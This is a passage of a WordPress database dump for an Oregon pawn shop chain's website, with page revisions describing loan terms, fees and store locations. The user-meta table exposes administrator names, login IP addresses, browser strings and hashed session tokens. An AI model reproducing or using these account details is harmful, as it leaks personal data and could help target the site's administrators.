class=\"loans-left\"></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"></div>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:13:07','2015-03-11 05:13:07','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(260,2,'2015-03-10 22:15:12','2015-03-11 05:15:12','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"></div>\r\n \r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:15:12','2015-03-11 05:15:12','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(262,2,'2015-03-10 22:16:58','2015-03-11 05:16:58','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n \r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"604\" height=\"384\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:16:58','2015-03-11 05:16:58','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(263,2,'2015-03-10 22:19:27','2015-03-11 05:19:27','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 \" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"615\" height=\"391\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:19:27','2015-03-11 05:19:27','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(264,2,'2015-03-10 22:20:19','2015-03-11 05:20:19','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n \r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% re-sellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n \r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<img class=\"alignleft wp-image-217 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--1024x683.jpg\" alt=\"Electric Guitar\" width=\"604\" height=\"403\" />\r\n[/one_half]\r\n[one_half]\r\n\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<div class=\"loans\">\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" alignleft wp-image-211 \" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-1024x651.jpg\" alt=\"Guns\" width=\"624\" height=\"397\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:20:19','2015-03-11 05:20:19','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(265,2,'2015-03-15 11:38:54','2015-03-15 18:38:54','','GoldBracelets_1370x400_b','','inherit','open','open','','goldbracelets_1370x400_b','','','2015-03-15 11:38:54','2015-03-15 18:38:54','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/GoldBracelets_1370x400_b.png',0,'attachment','image/png',0),(266,2,'2015-03-15 11:39:02','2015-03-15 18:39:02','','GoldBracelets_1370x400','','inherit','open','open','','goldbracelets_1370x400','','','2015-03-15 11:39:02','2015-03-15 18:39:02','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/GoldBracelets_1370x400.png',0,'attachment','image/png',0),(267,2,'2015-03-15 11:39:09','2015-03-15 18:39:09','','Gold-Bracelets','','inherit','open','open','','gold-bracelets','','','2015-03-15 11:39:09','2015-03-15 18:39:09','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold-Bracelets.png',0,'attachment','image/png',0),(268,2,'2015-03-15 11:39:17','2015-03-15 18:39:17','','Diamond-Studs','','inherit','open','open','','diamond-studs','','','2015-03-15 11:39:17','2015-03-15 18:39:17','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Diamond-Studs.png',0,'attachment','image/png',0),(269,2,'2015-03-15 11:43:14','2015-03-15 18:43:14','','Diamond-Studs-300x299','','inherit','open','open','','diamond-studs-300x299','','','2015-03-15 11:43:14','2015-03-15 18:43:14','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Diamond-Studs-300x299.png',0,'attachment','image/png',0),(273,1,'2015-03-22 14:54:01','2015-03-22 21:54:01','','all-that-glitters-25-years','','inherit','open','open','','all-that-glitters-25-years','','','2015-03-22 14:54:19','2015-03-22 21:54:19','',0,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/all-that-glitters-25-years.png',0,'attachment','image/png',0),(274,1,'2015-03-22 15:02:06','2015-03-22 22:02:06','[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar-390.jpg\" banner_link=\"#\" title=\"Guitars\" text=\"We have guitars\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/ring-390.jpg\" banner_link=\"#\" title=\"Jewelry\" text=\"We have jewelry\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/gun-390.jpg\" banner_link=\"#\" title=\"Guns\" text=\"We have guns\" btn_text=\" \" target=\"_self\"]\r\n[clear]\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-22 15:02:06','2015-03-22 22:02:06','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(275,1,'2015-03-22 15:08:28','2015-03-22 22:08:28','[banner img=\"/fuze7/wp-content/uploads/2015/03/guitar-390.jpg\" banner_link=\"/fuze7/loans\" title=\"Guitars\" text=\"We have guitars\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/ring-390.jpg\" banner_link=\"/fuze7/jewelry\" title=\"Jewelry\" text=\"We have jewelry\" btn_text=\" \" target=\"_self\"]\r\n\r\n[banner img=\"/fuze7/wp-content/uploads/2015/03/gun-390.jpg\" banner_link=\"/fuze7/loans\" title=\"Guns\" text=\"We have guns\" btn_text=\" \" target=\"_self\"]\r\n[clear]\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n ','Home','','inherit','open','open','','48-revision-v1','','','2015-03-22 15:08:28','2015-03-22 22:08:28','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0); /*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_relationships` -- DROP TABLE IF EXISTS `wp_term_relationships`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL default '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL default '0', `term_order` int(11) NOT NULL default '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_relationships` -- LOCK TABLES `wp_term_relationships` WRITE; /*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */; INSERT INTO `wp_term_relationships` VALUES (1,1,0),(109,6,0),(64,6,0),(15,7,0),(14,7,0),(13,7,0),(189,2,0),(171,6,0),(60,6,0),(61,6,0),(62,6,0),(63,6,0),(182,6,0),(66,6,0),(67,6,0),(68,6,0),(122,6,0); /*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_taxonomy` -- DROP TABLE IF EXISTS `wp_term_taxonomy`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL auto_increment, `term_id` bigint(20) unsigned NOT NULL default '0', `taxonomy` varchar(32) NOT NULL default '', `description` longtext NOT NULL, `parent` bigint(20) unsigned NOT NULL default '0', `count` bigint(20) NOT NULL default '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_term_taxonomy` -- LOCK TABLES `wp_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */; INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'product_type','',0,1),(3,3,'product_type','',0,0),(4,4,'product_type','',0,0),(5,5,'product_type','',0,0),(6,6,'nav_menu','',0,12),(7,7,'nav_menu','',0,3); /*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_terms` -- DROP TABLE IF EXISTS `wp_terms`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_terms` ( `term_id` bigint(20) unsigned NOT NULL auto_increment, `name` varchar(200) NOT NULL default '', `slug` varchar(200) NOT NULL default '', `term_group` bigint(10) NOT NULL default '0', PRIMARY KEY (`term_id`), KEY `name` (`name`), KEY `slug` (`slug`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_terms` -- LOCK TABLES `wp_terms` WRITE; /*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */; INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'simple','simple',0),(3,'grouped','grouped',0),(4,'variable','variable',0),(5,'external','external',0),(6,'Menu','menu',0),(7,'Shopping','shopping',0); /*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_usermeta` -- DROP TABLE IF EXISTS `wp_usermeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL auto_increment, `user_id` bigint(20) unsigned NOT NULL default '0', `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM AUTO_INCREMENT=70 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_usermeta` -- LOCK TABLES `wp_usermeta` WRITE; /*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */; INSERT INTO `wp_usermeta` VALUES (1,1,'first_name','Daniel'),(2,1,'last_name','Payne'),(3,1,'nickname','tualatinweb'),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers','wp350_media,wp360_revisions,wp360_locks,wp390_widgets,xyz2,xyz3,wp410_dfw'),(13,1,'show_welcome_panel','0'),(14,1,'default_password_nag',''),(15,1,'wp_dashboard_quick_press_last_post_id','270'),(16,1,'closedpostboxes_dashboard','a:0:{}'),(17,1,'metaboxhidden_dashboard','a:4:{i:0;s:19:\"dashboard_right_now\";i:1;s:18:\"dashboard_activity\";i:2;s:21:\"dashboard_quick_press\";i:3;s:17:\"dashboard_primary\";}'),(69,1,'session_tokens','a:2:{s:64:\"b6f1336d8353c6dd3d535d41f0999a3dd6aee0efbb3e9659063a85be97034915\";a:4:{s:10:\"expiration\";i:1427233182;s:2:\"ip\";s:12:\"50.53.158.45\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36\";s:5:\"login\";i:1427060382;}s:64:\"452736a82bfbc75ec39bf095952f83c0a7669977e34341c04b8f8487126c833f\";a:4:{s:10:\"expiration\";i:1427233497;s:2:\"ip\";s:12:\"50.53.158.45\";s:2:\"ua\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36\";s:5:\"login\";i:1427060697;}}'),(19,1,'tgmpa_dismissed_notice_tgmpa','1'),(20,1,'managenav-menuscolumnshidden','a:3:{i:0;s:11:\"css-classes\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(21,1,'metaboxhidden_nav-menus','a:9:{i:0;s:8:\"add-post\";i:1;s:11:\"add-product\";i:2;s:13:\"add-portfolio\";i:3;s:12:\"add-post_tag\";i:4;s:15:\"add-post_format\";i:5;s:15:\"add-product_cat\";i:6;s:15:\"add-product_tag\";i:7;s:22:\"add-portfolio_category\";i:8;s:17:\"add-portfolio_tag\";}'),(22,1,'nav_menu_recently_edited','6'),(23,2,'nickname','diane'),(24,2,'first_name','Diane'),(25,2,'last_name','Economaki'),(26,2,'description',''),(27,2,'rich_editing','true'),(28,2,'comment_shortcuts','false'),(29,2,'admin_color','fresh'),(30,2,'use_ssl','0'),(31,2,'show_admin_bar_front','true'),(32,2,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(33,2,'wp_user_level','10'),(34,2,'dismissed_wp_pointers','wp360_locks,wp390_widgets,wp410_dfw,xyz2'),(35,1,'billing_first_name',''),(36,1,'billing_last_name',''),(37,1,'billing_company',''),(38,1,'billing_address_1',''),(39,1,'billing_address_2',''),(40,1,'billing_city',''),(41,1,'billing_postcode',''),(42,1,'billing_state',''),(43,1,'billing_country',''),(44,1,'billing_phone',''),(45,1,'billing_email',''),(46,1,'shipping_first_name',''),(47,1,'shipping_last_name',''),(48,1,'shipping_company',''),(49,1,'shipping_address_1',''),(50,1,'shipping_address_2',''),(51,1,'shipping_city',''),(52,1,'shipping_postcode',''),(53,1,'shipping_state',''),(54,1,'shipping_country',''),(55,2,'session_tokens','a:4:{s:64:\"16d19b4034064b99ac46afacc17117a888e8f3b1134e6ebdd2db72bf56472130\";a:4:{s:10:\"expiration\";i:1427134660;s:2:\"ip\";s:13:\"98.246.136.79\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36\";s:5:\"login\";i:1426961860;}s:64:\"7bc066163448328bdec51443eb3c9704d858fa3ab50fde41ced48333ab8c5fe3\";a:4:{s:10:\"expiration\";i:1427155801;s:2:\"ip\";s:13:\"98.246.136.79\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 